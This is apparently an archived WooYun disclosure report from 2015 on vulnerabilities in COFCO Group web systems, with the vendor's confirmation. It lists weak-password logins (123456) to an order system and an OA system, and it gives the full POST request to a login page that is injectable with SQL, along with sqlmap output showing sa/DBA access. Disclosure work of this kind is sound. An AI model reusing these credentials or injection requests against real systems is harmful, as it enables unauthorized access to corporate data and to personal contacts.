当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0157368

漏洞标题:中粮集团漏洞打包(订单系统弱口令/泄漏大量订单+某系统post注入/dba+25+全国分公司通讯录)

相关厂商:中粮集团有限公司

漏洞作者: 牛 小 帅

提交时间:2015-12-01 18:22

修复时间:2016-01-16 10:48

公开时间:2016-01-16 10:48

漏洞类型:敏感信息泄露

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-12-01: 细节已通知厂商并且等待厂商处理中
2015-12-02: 厂商已经确认,细节仅向厂商公开
2015-12-12: 细节向核心白帽子及相关领域专家公开
2015-12-22: 细节向普通白帽子公开
2016-01-01: 细节向实习白帽子公开
2016-01-16: 细节向公众公开

简要描述:

详细说明:

中粮经销商订单管理系统
http://dmoo.cofco.com/dmoo/jsp/main.jsp
这个应该是未修复,个人感觉应该要改密码

帐号是:张正平(这里打中文,避免被人利用)  123456


看了一下有最新12月1号的订单,订单金额都是10万左右的

C``{{VT$O73PR[0H9LH]KC2.png


=====================================================
中粮期货管理系统post注入 dba
http://219.143.252.76/cn/web/user_login.aspx

POST /cn/web/user_login.aspx HTTP/1.1
Host: 219.143.252.76
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://219.143.252.76/cn/web/user_login.aspx
Cookie: ASP.NET_SessionId=vr1l5hjwa0ylr4wxxzd0s5oa
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 265
__EVENTTARGET=lbLogin&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTkxNTcxOTIzM2RkkLBByD0zHNG5WTJppj%2FbUg5nd2HffJWrt%2FJHeGaXLpY%3D&__EVENTVALIDATION=%2FwEWBAL2qoSUBgLyj%2FOQAgLAr6WkDALRy8HXAnx0nPAi4SE70vMjy5yYI7%2Bbdcm8lK4p9%2FvbshL%2BET%2FF&tbUserName=test&tbPwd=test


[16:46:51] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2000
[16:46:51] [INFO] fetching current user
[16:46:51] [INFO] resumed: sa
current user: 'sa'


===========================================
http://dmoa.cofco.com/seeyon/main.do?method=index
wangm 123456
之前提交的没发现其他分公司,这次居然有其他分公司的通讯录

{)5$_T3LO5Y7TKYRV9_E[WQ.png


数了一下 应该是28家好像,这里就表示一下,不导出ex表格了

漏洞证明:

修复方案:

该修复的还是要认真修复,订单泄漏被操作,口令问题还是很重要

版权声明:转载请注明来源 牛 小 帅@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-12-02 10:47

厂商回复:

非常感谢,马上整改!

最新状态:

暂无